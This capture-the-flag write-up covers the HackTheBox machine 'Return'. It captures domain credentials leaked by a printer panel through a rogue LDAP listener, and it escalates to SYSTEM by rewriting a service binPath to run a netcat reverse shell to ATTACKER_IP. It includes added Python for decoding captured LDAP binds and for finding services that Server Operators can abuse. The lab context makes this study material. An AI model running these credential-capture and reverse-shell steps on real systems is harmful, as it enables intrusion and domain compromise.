Return is a Windows domain machine exposing SMB, WinRM, and a printer administration panel.
The printer panel leaks valid domain credentials when forced to authenticate to an attacker-controlled listener.
Privilege escalation is achieved through the Server Operators group by modifying the binPath of a Windows service.
Target: return.htb
Initial vector: Printer panel credential leak
Privilege escalation: Service modification via Server Operators
Nmap:
53/tcp    domain
80/tcp    http (IIS)
88/tcp    kerberos
135/tcp   msrpc
139/tcp   netbios-ssn
389/tcp   ldap
445/tcp   smb
5985/tcp  winrm
10000/tcp webmin
Port 80 hosts the “HTB Printer Admin Panel”. SMB enumeration reveals no anonymous shares:
$ crackmapexec smb 10.129.65.16
$ smbclient -L 10.129.65.16 -N
$ smbmap -H 10.129.65.16
The printer panel allows configuring a network printer, including the server address it authenticates to. If we point that address at our attacker machine, the panel connects to us on the LDAP port and performs a simple bind with the stored account. An LDAP simple bind carries the password in cleartext, so a raw TCP listener on 389 is enough to capture it; no LDAP server needs to answer.
Start a listener on the attacker (389 is a privileged port, so run it as root):
$ nc -nlvp 389
Trigger the printer connection from the web panel. Captured credentials:
svc-printer : 1edFg43012!!
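The nc listener shows the bind as raw bytes with the DN and password embedded in BER encoding. As an added example that is not part of the original write-up, the Python below decodes an LDAPv3 simple BindRequest (RFC 4511 section 4.2) into (messageID, dn, password), and capture_bind() is a drop-in for the nc listener. The sample message is constructed locally with build_simple_bind() using the credentials shown above as sample data; the panel's actual request is not reproduced here, and all function names are this example's own.

```python
"""Decode the LDAP simple BindRequest a client sends to a rogue LDAP server.
Added example, not code from the original write-up. The sample message is
built locally with build_simple_bind(); the panel's real request is not
reproduced here."""
import socket


def _int_bytes(n):
    """DER encoding of a non-negative INTEGER (big-endian two's complement)."""
    return n.to_bytes(n.bit_length() // 8 + 1, "big", signed=True)


def _tlv(tag, value):
    """One BER TLV with definite length: short form below 128, long form above."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def _read_tlv(buf, pos):
    """Read the TLV at buf[pos]; return (tag, value, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER element")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                     # long form: low 7 bits = byte count of the length
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(msg_id, dn, password):
    """LDAPMessage { messageID, BindRequest { version 3, name, simple [0] } }."""
    bind = _tlv(0x02, _int_bytes(3)) + _tlv(0x04, dn.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _tlv(0x02, _int_bytes(msg_id)) + _tlv(0x60, bind))  # 0x60 = [APPLICATION 0]


def parse_simple_bind(data):
    """Return (messageID, dn, password) if `data` is a simple BindRequest, else None."""
    tag, body, _ = _read_tlv(data, 0)
    if tag != 0x30:                       # LDAPMessage is a SEQUENCE
        return None
    tag, mid, pos = _read_tlv(body, 0)
    if tag != 0x02 or pos >= len(body):
        return None
    tag, bind, _ = _read_tlv(body, pos)
    if tag != 0x60:                       # search, unbind, ... are not binds
        return None
    _, _version, pos = _read_tlv(bind, 0)
    _, dn, pos = _read_tlv(bind, pos)
    tag, cred, _ = _read_tlv(bind, pos)
    if tag != 0x80:                       # 0xA3 would be a SASL bind: no cleartext password
        return None
    return (int.from_bytes(mid, "big", signed=True),
            dn.decode("utf-8", "replace"), cred.decode("utf-8", "replace"))


def capture_bind(port=389, timeout=120):
    """Accept one connection on `port` and decode its first message.
    No BindResponse is sent back; the credentials are already on the wire."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, _peer = srv.accept()
        with conn:
            data = conn.recv(4096)        # a bind request is far smaller than one recv
    return parse_simple_bind(data)


if __name__ == "__main__":
    # Constructed sample, using the credentials from the write-up as placeholder data.
    sample = build_simple_bind(1, "return\\svc-printer", "1edFg43012!!")
    print(sample.hex())
    print(parse_simple_bind(sample))
    # print(capture_bind())   # as root on the attacker host, then trigger the panel
```

Run it as root on the attacker host in place of nc, trigger the panel, and the decoded triple is printed; a SASL bind or any non-bind operation returns None rather than a garbled password.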
Validate with WinRM:
$ crackmapexec winrm 10.129.65.16 -u svc-printer -p '1edFg43012!!' -> Pwn3d!
Obtain a shell:
$ evil-winrm -i 10.129.65.16 -u svc-printer -p '1edFg43012!!'
Check privileges:
whoami /priv
net user svc-printer
The account is a member of:
Remote Management Users
Server Operators
Server Operators is a built-in group that exists on domain controllers; its members can log on to the DC, stop and start services, and hold change-config rights on a number of services. A member who can change a service's binPath and restart it gets the new command run under the service's account, which for many services is LocalSystem: arbitrary command execution as SYSTEM.
Upload nc.exe to the target:
PS> upload nc.exe C:\Windows\Temp\nc.exe
Find a service the group can reconfigure. Rather than trial and error, read each candidate's security descriptor and check which account it runs as:
sc.exe sdshow <SERVICE>
sc.exe qc <SERVICE>
In the sdshow output, look for an allow ACE whose trustee is SO (Server Operators) and whose rights include DC (SERVICE_CHANGE_CONFIG) together with RP (start) and WP (stop). In the qc output, SERVICE_START_NAME should be LocalSystem. Note the original BINARY_PATH_NAME so it can be restored afterwards.
Modify its binPath (the space after binPath= is required by sc.exe):
sc.exe config <SERVICE> binPath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
Restart the service:
sc.exe stop <SERVICE>
sc.exe start <SERVICE>
The start call reports an error or times out because nc.exe never reports its status to the Service Control Manager, but the process has already been spawned as SYSTEM and the callback arrives.
Listener on attacker:
$ nc -nlvp 4444 -> SYSTEM shell
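Checking service descriptors by eye is error-prone when several candidates are involved, so the following Python, an added example that is not from the original write-up, parses the SDDL strings that sc.exe sdshow prints and lists the services where Server Operators (SDDL alias SO, SID S-1-5-32-549) hold change-config, start and stop. The SAMPLE descriptors are constructed for illustration and were not dumped from return.htb; the function names and the policy they apply (explicit deny ACEs win, GENERIC_ALL and GENERIC_WRITE count as change-config) are this example's own.

```python
"""Pick out services whose DACL lets a trustee rewrite binPath and restart them.
Input is the SDDL string printed by `sc.exe sdshow <service>` on the target.
Added example, not from the original write-up; SAMPLE is constructed, not
dumped from return.htb."""
import re

# Service-specific rights as the two-letter codes sc.exe sdshow prints ...
RIGHT_CODES = {
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
    "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
    "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ", "GX": "GENERIC_EXECUTE",
}
# ... and as mask bits, for descriptors that print the rights as a hex number.
RIGHT_BITS = {
    0x0001: "QUERY_CONFIG", 0x0002: "CHANGE_CONFIG", 0x0004: "QUERY_STATUS",
    0x0008: "ENUMERATE_DEPENDENTS", 0x0010: "START", 0x0020: "STOP",
    0x0040: "PAUSE_CONTINUE", 0x0080: "INTERROGATE", 0x0100: "USER_DEFINED_CONTROL",
    0x10000000: "GENERIC_ALL", 0x40000000: "GENERIC_WRITE",
}
NEEDED = {"CHANGE_CONFIG", "START", "STOP"}    # rewrite binPath, then bounce the service
SERVER_OPERATORS = ("SO", "S-1-5-32-549")      # SDDL alias and the group's SID


def decode_rights(field):
    """Expand an ACE rights field (letter pairs or a 0x mask) into right names."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {name for bit, name in RIGHT_BITS.items() if mask & bit}
    return {RIGHT_CODES.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)}


def parse_dacl(sddl):
    """Yield (ace_type, rights, trustee) for each ACE of the DACL; the SACL is ignored."""
    dacl = sddl.split("S:", 1)[0]
    if not dacl.startswith("D:"):
        raise ValueError("descriptor has no DACL")
    for ace in re.findall(r"\(([^)]*)\)", dacl):
        fields = ace.split(";")            # type;flags;rights;object;inherit;trustee
        if len(fields) >= 6:
            yield fields[0], decode_rights(fields[2]), fields[5]


def effective_rights(sddl, trustees=SERVER_OPERATORS):
    """Rights granted to any of `trustees`, minus anything an explicit deny ACE removes.
    GENERIC_ALL and GENERIC_WRITE are expanded because both cover CHANGE_CONFIG."""
    allowed, denied = set(), set()
    for ace_type, rights, who in parse_dacl(sddl):
        if who not in trustees:
            continue
        if "GENERIC_ALL" in rights:
            rights = rights | set(RIGHT_BITS.values())
        if "GENERIC_WRITE" in rights:
            rights = rights | {"CHANGE_CONFIG"}
        if ace_type == "A":
            allowed |= rights
        elif ace_type == "D":
            denied |= rights
    return allowed - denied


def abusable(services, trustees=SERVER_OPERATORS):
    """Names of services where `trustees` hold CHANGE_CONFIG, START and STOP together.
    Still confirm SERVICE_START_NAME is LocalSystem with `sc.exe qc` before using one."""
    return sorted(name for name, sddl in services.items()
                  if NEEDED <= effective_rights(sddl, trustees))


# Constructed descriptors shaped like sc.exe sdshow output (not from return.htb).
SAMPLE = {
    "svcA": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;CCLCSWLOCRRC;;;IU)"
            "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "svcB": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;SO)",
    "svcC": "D:(D;;DC;;;SO)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)",
    "svcD": "D:(A;;0x10000000;;;SO)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLE.items():
        print(name, sorted(effective_rights(sddl)))
    print("abusable by Server Operators:", abusable(SAMPLE))
```

On the sample set only svcA (explicit DC/RP/WP for SO) and svcD (GENERIC_ALL via a hex mask) qualify; svcB grants SO read-only rights and svcC has a deny ACE on DC that overrides the later allow. Paste the real sdshow strings from the target into the dictionary to run the same check there.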
Return demonstrates a classic Windows misconfiguration: a printer panel leaking domain credentials, combined with the powerful Server Operators group. By modifying a service's binPath, full SYSTEM compromise is achieved.